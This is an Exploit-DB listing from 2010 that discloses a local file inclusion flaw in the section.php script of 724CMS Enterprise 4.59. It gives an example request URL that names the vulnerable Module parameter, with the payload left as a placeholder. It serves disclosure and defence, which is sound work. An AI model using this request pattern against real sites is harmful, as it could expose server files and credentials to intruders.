724CMS Enterprise 4.59 - section.php LFI Vulnerability

2010-05-11T00:00:00
ID EDB-ID:12565
Type exploitdb
Reporter CoBRa_21
Modified 2010-05-11T00:00:00

Description

724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability. Webapps exploit for php platform

                                        
                                            -------------------------------------------------------------------------------------------

724CMS Enterprise Version 4.59 (section.php) LFI Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Name: 724CMS Enterprise Version 4.59

Download: http://724cms.com/

-------------------------------------------------------------------------------------------

Exploit:

http://localhost/[path]/section.php?Module_Text=CoBRa_21&ID=6&Lang=En&Nav=Section&Module= [LFİ]

-------------------------------------------------------------------------------------------

Thanks cyberlog ;)

-------------------------------------------------------------------------------------------